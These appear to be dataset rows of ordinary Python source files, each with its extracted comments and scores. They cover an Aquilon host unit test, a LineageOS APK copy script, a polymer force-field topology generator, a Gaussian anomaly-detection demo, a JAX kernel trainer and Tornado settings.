macs = [ip.mac] # , self.net["zebra_eth1"].usable[1].mac]
for host in network.hosts:
if host.ip != str(ip):
continue
seen = True
self.assertTrue(host.archetype.name == "aquilon",
"archetype is '%s' instead of aquilon" %
host.archetype.name)
self.assertTrue(host.mac in macs,
"MAC is '%s' instead of %r" %
(host.mac, macs))
macs.remove(host.mac)
self.assertTrue(seen, "%s is missing from network protobuf output" % ip)
def test_150_add_unittest22(self):
ip = self.net["zebra_eth0"].usable[2]
self.dsdb_expect_add("unittest22.aqd-unittest.ms.com", ip, "br0")
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest22.aqd-unittest.ms.com",
"--ip", ip, "--machine", "ut3c5n4",
"--domain", "unittest",
"--personality", "compileserver"])
self.dsdb_verify()
def test_155_verify_unittest22_network(self):
net = self.net["zebra_eth0"]
ip = net.usable[2]
command = ["show", "network", "--ip", net.ip, "--hosts",
"--format", "proto"]
network = self.protobuftest(command, expect=1)[0]
seen = False
macs = [ip.mac] # , self.net["zebra_eth1"].usable[2].mac]
for host in network.hosts:
if host.ip != str(ip):
continue
seen = True
self.assertTrue(host.archetype.name == "aquilon",
"archetype is '%s' instead of aquilon" %
host.archetype.name)
self.assertTrue(host.mac in macs,
"MAC is '%s' instead of %r" %
(host.mac, macs))
macs.remove(host.mac)
self.assertTrue(seen, "%s is missing from network protobuf output" % ip)
def test_160_add_unittest23(self):
ip = self.net["vpls"].usable[1]
self.dsdb_expect_add("unittest23.aqd-unittest.ms.com", ip, "eth0",
ip.mac)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest23.aqd-unittest.ms.com",
"--ip", ip, "--machine", "ut3c5n5",
"--domain", "unittest",
"--personality", "compileserver"])
self.dsdb_verify()
def test_161_add_unittest24(self):
ip = self.net["vpls"].usable[2]
self.dsdb_expect_add("unittest24.one-nyp.ms.com", ip, "eth0",
ip.mac)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest24.one-nyp.ms.com",
"--ip", ip, "--machine", "np3c5n5",
"--domain", "unittest",
"--personality", "compileserver"])
self.dsdb_verify()
def test_162_add_unittest25(self):
ip = self.net["unknown0"].usable[20]
self.dsdb_expect_add("unittest25.aqd-unittest.ms.com", ip, "eth0",
ip.mac)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest25.aqd-unittest.ms.com",
"--ip", ip, "--machine", "ut3c5n7",
"--domain", "unittest",
"--personality", "compileserver"])
self.dsdb_verify()
def test_163_add_unittest26(self):
ip = self.net["unknown0"].usable[23]
self.dsdb_expect_add("unittest26.aqd-unittest.ms.com", ip, "eth0",
ip.mac)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest26.aqd-unittest.ms.com",
"--ip", ip, "--machine", "ut3c5n8",
"--domain", "unittest",
"--personality", "compileserver"])
self.dsdb_verify()
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestAddAquilonHost)
unittest.TextTestRunner(verbosity=2).run(suite)
| en | 0.726431 | #!/usr/bin/env python # -*- cpy-indent-level: 4; indent-tabs-mode: nil -*- # ex: set expandtab softtabstop=4 shiftwidth=4: # # Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016,2017 Contributor # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Module for testing the add host command. # TODO: this file should be merged into test_add_host.py # Add the transit before the host to verify that the reverse DNS entry # will get fixed up # , self.net["zebra_eth1"].usable[1].mac] # , self.net["zebra_eth1"].usable[2].mac] | 1.95309 | 2 |
copy_files.py | tprasadtp/lineageos-apk-extractor | 8 | 6616846 | <gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copy files from /mnt/lineage
to releases folder and rename them according to tag.
Must be executed after ./los_extractor.py
This does not mount/extract the the image.
Use scripts/extract.sh
Uses a json file to map filenames to paths.
"""
# Standard Library Imports
import argparse
import json
import logging
import os
from pathlib import Path
import platform
import shutil
import sys
# Intenal Imports from project
from utils import get_file as dl
from utils import get_log_level, set_logger, write_json
MOUNT_POINT = "/mnt/lineage/"
RELEASE_DIR = Path("releases")
METADATA_DIR = Path("metadata")
DEVICE_NAME = os.environ.get("LOS_DEVICE_CODENAME", "bullhead")
RELEASE_NOTES = "metadata/Release-Notes.md"
# if os.environ.get('TRAVIS') == "true" or os.environ.get('CI') == "true":
# print("Running on TRAVIS or other CI.")
# TRANSFER_JSON = "transfer.json"
TRANSFER_JSON = "data/transfer.json"
# else:
# TRANSFER_JSON = "test_transfer.json"
# Logs
# create logger
log = set_logger()
def define_tag_from_json(release_json):
"""
Read release.json to set TAG variable
"""
log.debug("Setting TAG Variable")
if os.path.isfile(release_json):
try:
log.info("Reading json data from file.")
with open(release_json) as r:
jsondata = json.loads(r.read())
global TAG
TAG = jsondata["release"]["tag"]
if str(TAG) == "":
log.critical("TAG is empty!.")
sys.exit(10)
except Exception as e:
log.critical("Failed to read from %s", release_json)
log.exception(e)
sys.exit(1)
else:
log.critical("%s is not found on the FS", release_json)
sys.exit(1)
def copy_release_files(mount_point, transfer_json):
""""
Checks if mount point is available. If true,
Copies APKS and other release assets to ./releases folder
"""
log.info("Checking Mount point")
if os.path.ismount(mount_point) or os.path.isdir(mount_point):
if Path(RELEASE_DIR).exists():
log.debug("%s folder is already present. deleting it..", RELEASE_DIR)
try:
shutil.rmtree(RELEASE_DIR)
except Exception:
log.critical("Failed to delete already existing %s", RELEASE_DIR)
sys.exit(1)
try:
log.debug("Creating releases folder")
os.makedirs(RELEASE_DIR)
except Exception as e:
log.critical("Failed to create %s directory.", RELEASE_DIR)
log.exception(e)
sys.exit(1)
if os.path.isfile(transfer_json):
with open(transfer_json) as t:
transfer = json.loads(t.read())
for app, path in transfer.items():
fname = app + "-" + TAG + os.path.splitext(path)[1]
try:
log.info("Copying %s from %s", app, path)
shutil.copy2(path, RELEASE_DIR / fname)
except Exception as e:
log.error("Failed to Copy %s", app)
log.exception(e)
else:
log.critical(
"%s is not present. Cannot determine file list.", transfer_json
)
sys.exit(1)
def copy_metadata_files():
log.info("Copying Metadata")
try:
log.info("Copying README.md")
shutil.copy2("README.md", METADATA_DIR / "README.md")
except Exception as e:
log.critical("Failed to copy Readme.md")
log.exception(e)
sys.exit(1)
def main(device, transfer_json, test_mode):
"""
Main
"""
release_josn = f"metadata/release-{device}.json"
if test_mode:
log.warn("Test mode is active")
mount_point = "test/"
else:
mount_point = MOUNT_POINT
define_tag_from_json(release_josn)
copy_metadata_files()
copy_release_files(mount_point, transfer_json)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
add_help=True,
)
parser.add_argument(
"-d", "--device", required=True, type=str, help="Device Codename"
)
parser.add_argument(
"-l", "--list", required=True, type=str, help="Json list mapping"
)
parser.add_argument(
"-q",
"--quiet",
action="count",
help="Decrease output verbosity \
Default level is INFO",
)
parser.add_argument(
"-t",
"--test-mode",
required=False,
action="store_true",
help="Use Test Mode without mounting img",
)
args = parser.parse_args()
log.setLevel(get_log_level(args.quiet))
main(args.device, args.list, args.test_mode)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copy files from /mnt/lineage
to releases folder and rename them according to tag.
Must be executed after ./los_extractor.py
This does not mount/extract the the image.
Use scripts/extract.sh
Uses a json file to map filenames to paths.
"""
# Standard Library Imports
import argparse
import json
import logging
import os
from pathlib import Path
import platform
import shutil
import sys
# Intenal Imports from project
from utils import get_file as dl
from utils import get_log_level, set_logger, write_json
MOUNT_POINT = "/mnt/lineage/"
RELEASE_DIR = Path("releases")
METADATA_DIR = Path("metadata")
DEVICE_NAME = os.environ.get("LOS_DEVICE_CODENAME", "bullhead")
RELEASE_NOTES = "metadata/Release-Notes.md"
# if os.environ.get('TRAVIS') == "true" or os.environ.get('CI') == "true":
# print("Running on TRAVIS or other CI.")
# TRANSFER_JSON = "transfer.json"
TRANSFER_JSON = "data/transfer.json"
# else:
# TRANSFER_JSON = "test_transfer.json"
# Logs
# create logger
log = set_logger()
def define_tag_from_json(release_json):
"""
Read release.json to set TAG variable
"""
log.debug("Setting TAG Variable")
if os.path.isfile(release_json):
try:
log.info("Reading json data from file.")
with open(release_json) as r:
jsondata = json.loads(r.read())
global TAG
TAG = jsondata["release"]["tag"]
if str(TAG) == "":
log.critical("TAG is empty!.")
sys.exit(10)
except Exception as e:
log.critical("Failed to read from %s", release_json)
log.exception(e)
sys.exit(1)
else:
log.critical("%s is not found on the FS", release_json)
sys.exit(1)
def copy_release_files(mount_point, transfer_json):
""""
Checks if mount point is available. If true,
Copies APKS and other release assets to ./releases folder
"""
log.info("Checking Mount point")
if os.path.ismount(mount_point) or os.path.isdir(mount_point):
if Path(RELEASE_DIR).exists():
log.debug("%s folder is already present. deleting it..", RELEASE_DIR)
try:
shutil.rmtree(RELEASE_DIR)
except Exception:
log.critical("Failed to delete already existing %s", RELEASE_DIR)
sys.exit(1)
try:
log.debug("Creating releases folder")
os.makedirs(RELEASE_DIR)
except Exception as e:
log.critical("Failed to create %s directory.", RELEASE_DIR)
log.exception(e)
sys.exit(1)
if os.path.isfile(transfer_json):
with open(transfer_json) as t:
transfer = json.loads(t.read())
for app, path in transfer.items():
fname = app + "-" + TAG + os.path.splitext(path)[1]
try:
log.info("Copying %s from %s", app, path)
shutil.copy2(path, RELEASE_DIR / fname)
except Exception as e:
log.error("Failed to Copy %s", app)
log.exception(e)
else:
log.critical(
"%s is not present. Cannot determine file list.", transfer_json
)
sys.exit(1)
def copy_metadata_files():
log.info("Copying Metadata")
try:
log.info("Copying README.md")
shutil.copy2("README.md", METADATA_DIR / "README.md")
except Exception as e:
log.critical("Failed to copy Readme.md")
log.exception(e)
sys.exit(1)
def main(device, transfer_json, test_mode):
"""
Main
"""
release_josn = f"metadata/release-{device}.json"
if test_mode:
log.warn("Test mode is active")
mount_point = "test/"
else:
mount_point = MOUNT_POINT
define_tag_from_json(release_josn)
copy_metadata_files()
copy_release_files(mount_point, transfer_json)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
add_help=True,
)
parser.add_argument(
"-d", "--device", required=True, type=str, help="Device Codename"
)
parser.add_argument(
"-l", "--list", required=True, type=str, help="Json list mapping"
)
parser.add_argument(
"-q",
"--quiet",
action="count",
help="Decrease output verbosity \
Default level is INFO",
)
parser.add_argument(
"-t",
"--test-mode",
required=False,
action="store_true",
help="Use Test Mode without mounting img",
)
args = parser.parse_args()
log.setLevel(get_log_level(args.quiet))
main(args.device, args.list, args.test_mode) | en | 0.7067 | #!/usr/bin/env python # -*- coding: utf-8 -*- Copy files from /mnt/lineage to releases folder and rename them according to tag. Must be executed after ./los_extractor.py This does not mount/extract the the image. Use scripts/extract.sh Uses a json file to map filenames to paths. # Standard Library Imports # Intenal Imports from project # if os.environ.get('TRAVIS') == "true" or os.environ.get('CI') == "true": # print("Running on TRAVIS or other CI.") # TRANSFER_JSON = "transfer.json" # else: # TRANSFER_JSON = "test_transfer.json" # Logs # create logger Read release.json to set TAG variable " Checks if mount point is available. If true, Copies APKS and other release assets to ./releases folder Main | 2.673667 | 3 |
polymer_force_field/add_monomer.py | UWPRG/Nance_Enzyme_Encap_MD | 1 | 6616847 | <gh_stars>1-10
import os.path as op
from io import StringIO
import pandas as pd
data_dir = op.join(op.dirname(__file__), '/suppscr/pfaendtner/cnyambura/NEE_home/BSA_Nano_Prep/PEG_chain/ffmaker_PEG')
ff_dir = op.join(op.dirname(__file__), '/suppscr/pfaendtner/cnyambura/NEE_home/BSA_Nano_Prep/polymer_force_field/conf_data/MOD_n_amber99sb-ildn.ff/')
# give file names for topology and force field
polymer_topolgy = op.join(data_dir, 'PEG_GMX.top')
force_field_nonbonded = op.join(ff_dir, 'ffnonbonded.itp')
force_field_bonded = op.join(ff_dir, 'ffbonded.itp')
cap2 = {'name': 'tPEG',
'list': ['O3','C5','H10','H11','C6','H12','H13','O4','H14']
}
monomer = {'name': 'PEG',
'list': ['O2','C3','H6','H7','C4','H8','H9']
}
cap0 = {'name': 'sPEG',
'list': ['H1','O1','C1','H2','H3','C2','H4','H5']
}
# read file into string for parsing
def parse_topology(filename, section, header):
top_string = ''
with open(filename) as top_file:
for line in top_file:
top_string += line
# process section string for conversion to dataframe
section_string = top_string.split(section)[1].split('\n\n')[0]
pandas_readable = StringIO(section_string)
# create section DataFrame
section_df = pd.read_table(pandas_readable, sep='\s+',
comment=';', names=header)
return section_df
# define headers for sections of interest
atoms_header = ['nr', 'type', 'resi', 'res',
'atom', 'cgnr', 'charge', 'mass']
atom_types_header = ['name', 'bond_type', 'mass', 'charge',
'ptype', 'sigma', 'epsilon']
bonds_header = ['ai', 'aj', 'funct', 'r', 'k']
# get polymer topology DataFrames
atoms = parse_topology(polymer_topolgy, '[ atoms ]', atoms_header)
bonds = parse_topology(polymer_topolgy, '[ bonds ]', bonds_header)
atom_types = parse_topology(polymer_topolgy, '[ atomtypes ]',
atom_types_header)
for index, row in atoms.iterrows():
if row['atom'] in monomer['list']:
atoms.loc[index, 'restype'] = monomer['name']
elif row['atom'] in cap0['list']:
atoms.loc[index, 'restype'] = cap0['name']
elif row['atom'] in cap2['list']:
atoms.loc[index, 'restype'] = cap2['name']
# get force field topology DataFrames
ff_bonds = parse_topology(force_field_bonded, '[ bondtypes ]',
bonds_header)
ff_atom_types = parse_topology(force_field_nonbonded, '[ atomtypes ]',
atom_types_header)
for index, row in atom_types.iterrows():
# attempt to assign atom type based on LJ parameters
candidates = ff_atom_types.ix[
(ff_atom_types['sigma'] == row['sigma'])
& (ff_atom_types['epsilon'] == row['epsilon'])]
# holler if there are no matches!
if candidates.empty:
print('Ooops! Could not find match for atom type {} in '
'this forcefield! Add this atom manually.'.format(row['name']))
continue
# assign atom type if there is only match
if len(candidates) == 1:
atoms.loc[atoms['type'] == row['name'], 'ff_name'] = candidates['name'].values[0]
continue
atom_number = atoms[atoms['type'] == row['name']]['nr'].values[0]
atom_names = str(
atoms[atoms['type'] == row['name']]['atom'].values
).replace('[', '').replace(']', '')
bond_check = bonds.ix[
(bonds['ai'] == atom_number)
| (bonds['aj'] == atom_number)]
bond_candidates = ff_bonds.ix[
(ff_bonds['r'] == bond_check['r'].values[0])
& (ff_bonds['k'] == bond_check['k'].values[0])]
if bond_candidates.empty:
print("Found several candidate atomtypes based "
"on LJ paramters, but no perfect bond mathches.\n")
# quick last ditch assignment based on name
if row['name'].upper() in candidates['name'].values:
print("Approximate name match found. Would you like "
"to assign atomtype '{}' from the force field "
"to your atom(s) {}?".format(
row['name'].upper(), atom_names))
choice = input("(y/n): ")
if choice == 'y':
atoms.loc[atoms['type'] == row['name'], 'ff_name'] = row['name'].upper()
continue
print("Here is a list of other candidates.")
print("Please choose an atom name for '{}' "
"from the following list:".format(row['name']))
for idx, name in enumerate(candidates['name'].values):
print('{}. {}'.format(idx, name))
selection = int(input('number: '))
atom_types.loc[index, 'ff_name'] = candidates['name'].values[selection]
# Alright.... let's say we've got atom types correctly assigned by this point.
# We'll have to do some manual editing, but we're close enough for government
# work. Now to format these things in the correct group.
for new_residue in atoms['restype'].unique():
res_df = atoms.loc[atoms['restype'] == new_residue, :]
header = '[ {} ]\n [ atoms ]\n'.format(new_residue)
res_string = [header]
for index, row in res_df.iterrows():
start_index = res_df.index[0]
name = row['atom']
ff_type = row['ff_name']
charge = row['charge']
id = row['nr'] - start_index
row_string = f"{name:>6} {ff_type:<3}{charge:17.5f} {id:5}\n"
res_string.append(row_string)
res_string.append(' [ bonds ]\n')
for index, row in bonds.iterrows():
atom1 = atoms.loc[atoms['nr'] == row['ai'], 'atom'].values[0]
atom2 = atoms.loc[atoms['nr'] == row['aj'], 'atom'].values[0]
if (atom1 in res_df['atom'].values) \
& (atom2 in res_df['atom'].values):
row_string = f'{atom1:>6} {atom2:>5}\n'
res_string.append(row_string)
elif atom1 in res_df['atom'].values:
atom2 = '+' + atom2
row_string = f'{atom1:>6} {atom2:>5}\n'
res_string.append(row_string)
elif atom2 in res_df['atom'].values:
atom1 = '-' + atom1
row_string = f'{atom1:>6} {atom2:>5}\n'
res_string.append(row_string)
res_top = ''.join(res_string)
outfile = "{}_top.itp".format(new_residue)
full_out_path = op.join(data_dir, outfile)
with open(full_out_path, "w") as text_file:
print(res_top, file=text_file)
| import os.path as op
from io import StringIO
import pandas as pd
data_dir = op.join(op.dirname(__file__), '/suppscr/pfaendtner/cnyambura/NEE_home/BSA_Nano_Prep/PEG_chain/ffmaker_PEG')
ff_dir = op.join(op.dirname(__file__), '/suppscr/pfaendtner/cnyambura/NEE_home/BSA_Nano_Prep/polymer_force_field/conf_data/MOD_n_amber99sb-ildn.ff/')
# give file names for topology and force field
polymer_topolgy = op.join(data_dir, 'PEG_GMX.top')
force_field_nonbonded = op.join(ff_dir, 'ffnonbonded.itp')
force_field_bonded = op.join(ff_dir, 'ffbonded.itp')
cap2 = {'name': 'tPEG',
'list': ['O3','C5','H10','H11','C6','H12','H13','O4','H14']
}
monomer = {'name': 'PEG',
'list': ['O2','C3','H6','H7','C4','H8','H9']
}
cap0 = {'name': 'sPEG',
'list': ['H1','O1','C1','H2','H3','C2','H4','H5']
}
# read file into string for parsing
def parse_topology(filename, section, header):
top_string = ''
with open(filename) as top_file:
for line in top_file:
top_string += line
# process section string for conversion to dataframe
section_string = top_string.split(section)[1].split('\n\n')[0]
pandas_readable = StringIO(section_string)
# create section DataFrame
section_df = pd.read_table(pandas_readable, sep='\s+',
comment=';', names=header)
return section_df
# define headers for sections of interest
atoms_header = ['nr', 'type', 'resi', 'res',
'atom', 'cgnr', 'charge', 'mass']
atom_types_header = ['name', 'bond_type', 'mass', 'charge',
'ptype', 'sigma', 'epsilon']
bonds_header = ['ai', 'aj', 'funct', 'r', 'k']
# get polymer topology DataFrames
atoms = parse_topology(polymer_topolgy, '[ atoms ]', atoms_header)
bonds = parse_topology(polymer_topolgy, '[ bonds ]', bonds_header)
atom_types = parse_topology(polymer_topolgy, '[ atomtypes ]',
atom_types_header)
for index, row in atoms.iterrows():
if row['atom'] in monomer['list']:
atoms.loc[index, 'restype'] = monomer['name']
elif row['atom'] in cap0['list']:
atoms.loc[index, 'restype'] = cap0['name']
elif row['atom'] in cap2['list']:
atoms.loc[index, 'restype'] = cap2['name']
# get force field topology DataFrames
ff_bonds = parse_topology(force_field_bonded, '[ bondtypes ]',
bonds_header)
ff_atom_types = parse_topology(force_field_nonbonded, '[ atomtypes ]',
atom_types_header)
for index, row in atom_types.iterrows():
# attempt to assign atom type based on LJ parameters
candidates = ff_atom_types.ix[
(ff_atom_types['sigma'] == row['sigma'])
& (ff_atom_types['epsilon'] == row['epsilon'])]
# holler if there are no matches!
if candidates.empty:
print('Ooops! Could not find match for atom type {} in '
'this forcefield! Add this atom manually.'.format(row['name']))
continue
# assign atom type if there is only match
if len(candidates) == 1:
atoms.loc[atoms['type'] == row['name'], 'ff_name'] = candidates['name'].values[0]
continue
atom_number = atoms[atoms['type'] == row['name']]['nr'].values[0]
atom_names = str(
atoms[atoms['type'] == row['name']]['atom'].values
).replace('[', '').replace(']', '')
bond_check = bonds.ix[
(bonds['ai'] == atom_number)
| (bonds['aj'] == atom_number)]
bond_candidates = ff_bonds.ix[
(ff_bonds['r'] == bond_check['r'].values[0])
& (ff_bonds['k'] == bond_check['k'].values[0])]
if bond_candidates.empty:
print("Found several candidate atomtypes based "
"on LJ paramters, but no perfect bond mathches.\n")
# quick last ditch assignment based on name
if row['name'].upper() in candidates['name'].values:
print("Approximate name match found. Would you like "
"to assign atomtype '{}' from the force field "
"to your atom(s) {}?".format(
row['name'].upper(), atom_names))
choice = input("(y/n): ")
if choice == 'y':
atoms.loc[atoms['type'] == row['name'], 'ff_name'] = row['name'].upper()
continue
print("Here is a list of other candidates.")
print("Please choose an atom name for '{}' "
"from the following list:".format(row['name']))
for idx, name in enumerate(candidates['name'].values):
print('{}. {}'.format(idx, name))
selection = int(input('number: '))
atom_types.loc[index, 'ff_name'] = candidates['name'].values[selection]
# Alright.... let's say we've got atom types correctly assigned by this point.
# We'll have to do some manual editing, but we're close enough for government
# work. Now to format these things in the correct group.
for new_residue in atoms['restype'].unique():
res_df = atoms.loc[atoms['restype'] == new_residue, :]
header = '[ {} ]\n [ atoms ]\n'.format(new_residue)
res_string = [header]
for index, row in res_df.iterrows():
start_index = res_df.index[0]
name = row['atom']
ff_type = row['ff_name']
charge = row['charge']
id = row['nr'] - start_index
row_string = f"{name:>6} {ff_type:<3}{charge:17.5f} {id:5}\n"
res_string.append(row_string)
res_string.append(' [ bonds ]\n')
for index, row in bonds.iterrows():
atom1 = atoms.loc[atoms['nr'] == row['ai'], 'atom'].values[0]
atom2 = atoms.loc[atoms['nr'] == row['aj'], 'atom'].values[0]
if (atom1 in res_df['atom'].values) \
& (atom2 in res_df['atom'].values):
row_string = f'{atom1:>6} {atom2:>5}\n'
res_string.append(row_string)
elif atom1 in res_df['atom'].values:
atom2 = '+' + atom2
row_string = f'{atom1:>6} {atom2:>5}\n'
res_string.append(row_string)
elif atom2 in res_df['atom'].values:
atom1 = '-' + atom1
row_string = f'{atom1:>6} {atom2:>5}\n'
res_string.append(row_string)
res_top = ''.join(res_string)
outfile = "{}_top.itp".format(new_residue)
full_out_path = op.join(data_dir, outfile)
with open(full_out_path, "w") as text_file:
print(res_top, file=text_file) | en | 0.866329 | # give file names for topology and force field # read file into string for parsing # process section string for conversion to dataframe # create section DataFrame # define headers for sections of interest # get polymer topology DataFrames # get force field topology DataFrames # attempt to assign atom type based on LJ parameters # holler if there are no matches! # assign atom type if there is only match # quick last ditch assignment based on name # Alright.... let's say we've got atom types correctly assigned by this point. # We'll have to do some manual editing, but we're close enough for government # work. Now to format these things in the correct group. | 2.367573 | 2 |
anomaly.py | bitbloop/Anomaly | 0 | 6616848 |
import numpy as np
import matplotlib.pyplot as plt
#################
# DATA PROCESSING FUNCTIONS
# Normalize each column of the matrix to be in the range [low, high]
def scale_linear_by_column(rawpoints, high=1.0, low=0.0):
mins = np.min(rawpoints, axis=0)
maxs = np.max(rawpoints, axis=0)
rng = (maxs - mins)*0.5
return high - (((high - low) * (maxs - rawpoints)) / rng)
# Normalizes and shift the data
def preprocess_data(x):
#normalize the data
x=scale_linear_by_column(x) # np.linalg.norm(x, axis=0)
# shift the data
x=x-np.mean(x, axis=0)
return x
#################
# KERNEL FUNCTIONS
# Gaussian
def probability(x, u, sigma2):
sigma=np.sqrt(sigma2)
p=np.divide(1, np.sqrt(2*np.pi)*sigma, out=np.zeros_like(sigma), where=sigma!=0)
p=p*np.exp(-np.divide(np.square(x-u), 2*sigma2))
return np.prod(p, axis=1)
# Multivariate Gaussian
def probability_multivariate(x, u, E):
n=x[0,:].size
p1=np.dot(np.linalg.pinv(E),(x-u).T)
p2=np.exp(-0.5*((x-u)* p1.T))
p=np.divide(p2, np.power(np.power(2*np.pi, n/2)*np.linalg.det(E),0.5))
return np.prod(p, axis=1)
###################
# MAIN ALGORITHM
def main(unused_argv):
# input to the algorithm
m=6 # number of examples
m_test=3000 # number of tests
n=2 # number of features for each example. Here is 2 so we can plot directly.
x_orig=np.random.normal(size=[m,n]) # generate training data
x_test_orig=np.random.rand(m_test,n) # generate test data
x=preprocess_data(x_orig) # mean shift normalize
x_test=preprocess_data(x_test_orig)*2 # mean shift normalize
u=np.sum(x,axis=0)/m # mean
sigma2=np.sum(np.square(x-u),axis=0)/m # variance
p=probability(x_test, u, sigma2) # the probability that an example is an anomaly or not
E=np.dot((x-u).T,(x-u))/m # covariance matrix
#E=np.cov(x.T) # covariance matrix
p_multi=probability_multivariate(x_test, u, E) # the probability that an example is an anomaly or not
epsilon=0.182 # hand-picked threshold for flagging an example as an anomaly
# Plotting
plt.figure(1)
# plot predictions using gaussian distribution
plt.subplot(211)
plt.plot(x_test[p>=epsilon,0], x_test[p>=epsilon,1], "y+") #
plt.plot(x_test[p<epsilon,0], x_test[p<epsilon,1], "rx") # anomalous points
plt.plot(x[:,0], x[:,1], "bo") # data points
# plot predictions using multivariate gaussian distribution
plt.subplot(212)
plt.plot(x_test[p_multi>=epsilon,0], x_test[p_multi>=epsilon,1], "y+")
plt.plot(x_test[p_multi<epsilon,0], x_test[p_multi<epsilon,1], "rx")
plt.plot(x[:,0], x[:,1], "bo")
plt.show()
if __name__ == "__main__":
main(main) |
import numpy as np
import matplotlib.pyplot as plt
#################
# DATA PROCESSING FUNCTIONS
# Normalize each column of the matrix to be in the range [low, high]
def scale_linear_by_column(rawpoints, high=1.0, low=0.0):
mins = np.min(rawpoints, axis=0)
maxs = np.max(rawpoints, axis=0)
rng = (maxs - mins)*0.5
return high - (((high - low) * (maxs - rawpoints)) / rng)
# Normalizes and shift the data
def preprocess_data(x):
#normalize the data
x=scale_linear_by_column(x) # np.linalg.norm(x, axis=0)
# shift the data
x=x-np.mean(x, axis=0)
return x
#################
# KERNEL FUNCTIONS
# Gaussian
def probability(x, u, sigma2):
sigma=np.sqrt(sigma2)
p=np.divide(1, np.sqrt(2*np.pi)*sigma, out=np.zeros_like(sigma), where=sigma!=0)
p=p*np.exp(-np.divide(np.square(x-u), 2*sigma2))
return np.prod(p, axis=1)
# Multivariate Gaussian
def probability_multivariate(x, u, E):
n=x[0,:].size
p1=np.dot(np.linalg.pinv(E),(x-u).T)
p2=np.exp(-0.5*((x-u)* p1.T))
p=np.divide(p2, np.power(np.power(2*np.pi, n/2)*np.linalg.det(E),0.5))
return np.prod(p, axis=1)
###################
# MAIN ALGORITHM
def main(unused_argv):
# input to the algorithm
m=6 # number of examples
m_test=3000 # number of tests
n=2 # number of features for each example. Here is 2 so we can plot directly.
x_orig=np.random.normal(size=[m,n]) # generate training data
x_test_orig=np.random.rand(m_test,n) # generate test data
x=preprocess_data(x_orig) # mean shift normalize
x_test=preprocess_data(x_test_orig)*2 # mean shift normalize
u=np.sum(x,axis=0)/m # mean
sigma2=np.sum(np.square(x-u),axis=0)/m # variance
p=probability(x_test, u, sigma2) # the probability that an example is an anomaly or not
E=np.dot((x-u).T,(x-u))/m # covariance matrix
#E=np.cov(x.T) # covariance matrix
p_multi=probability_multivariate(x_test, u, E) # the probability that an example is an anomaly or not
epsilon=0.182 # hand-picked threshold for flagging an example as an anomaly
# Plotting
plt.figure(1)
# plot predictions using gaussian distribution
plt.subplot(211)
plt.plot(x_test[p>=epsilon,0], x_test[p>=epsilon,1], "y+") #
plt.plot(x_test[p<epsilon,0], x_test[p<epsilon,1], "rx") # anomalous points
plt.plot(x[:,0], x[:,1], "bo") # data points
# plot predictions using multivariate gaussian distribution
plt.subplot(212)
plt.plot(x_test[p_multi>=epsilon,0], x_test[p_multi>=epsilon,1], "y+")
plt.plot(x_test[p_multi<epsilon,0], x_test[p_multi<epsilon,1], "rx")
plt.plot(x[:,0], x[:,1], "bo")
plt.show()
if __name__ == "__main__":
main(main) | en | 0.645664 | ################# # DATA PROCESSING FUNCTIONS # Normalize each column of the matrix to be in the range [low, high] # Normalizes and shift the data #normalize the data # np.linalg.norm(x, axis=0) # shift the data ################# # KERNEL FUNCTIONS # Gaussian # Multivariate Gaussian ################### # MAIN ALGORITHM # input to the algorithm # number of examples # number of tests # number of features for each example. Here is 2 so we can plot directly. # generate training data # generate test data # mean shift normalize # mean shift normalize # mean # variance # the probability that an example is an anomaly or not # covariance matrix #E=np.cov(x.T) # covariance matrix # the probability that an example is an anomaly or not # hand-picked threshold for flagging an example as an anomaly # Plotting # plot predictions using gaussian distribution # # anomalous points # data points # plot predictions using multivariate gaussian distribution | 3.106913 | 3 |
src/jacho/recurrent_kernel/train.py | GJBoth/jacho | 4 | 6616849 | import jax
import jax.numpy as jnp
def train(model, params, data, *, alpha):
K_train, model_state = model.apply(params, data, method=model.train_kernel)
K_train = jax.ops.index_add(K_train, jnp.diag_indices(K_train.shape[0]), alpha)
# Calculating W_out; maybe use SVD through linalg?
c, low = jax.scipy.linalg.cho_factor(K_train, check_finite=False)
W_out = jax.scipy.linalg.cho_solve(
(c, low), data[-K_train.shape[0] :], check_finite=False
)
return (W_out, *model_state)
| import jax
import jax.numpy as jnp
def train(model, params, data, *, alpha):
K_train, model_state = model.apply(params, data, method=model.train_kernel)
K_train = jax.ops.index_add(K_train, jnp.diag_indices(K_train.shape[0]), alpha)
# Calculating W_out; maybe use SVD through linalg?
c, low = jax.scipy.linalg.cho_factor(K_train, check_finite=False)
W_out = jax.scipy.linalg.cho_solve(
(c, low), data[-K_train.shape[0] :], check_finite=False
)
return (W_out, *model_state)
| en | 0.913584 | # Calculating W_out; maybe use SVD through linalg? | 2.256417 | 2 |
App/settings.py | passed-by/WeatherTornado | 0 | 6616850 | # settings.py: 项目配置
import os
from tornado.options import define, options
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
define('port', default=8082, type=int)
define('debug', default=True, type=bool)
app_settings = {
"debug": options.debug,
"template_path": os.path.join(BASE_DIR, 'templates'),
"static_path": os.path.join(BASE_DIR, 'static'),
}
| # settings.py: 项目配置
import os
from tornado.options import define, options
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
define('port', default=8082, type=int)
define('debug', default=True, type=bool)
app_settings = {
"debug": options.debug,
"template_path": os.path.join(BASE_DIR, 'templates'),
"static_path": os.path.join(BASE_DIR, 'static'),
}
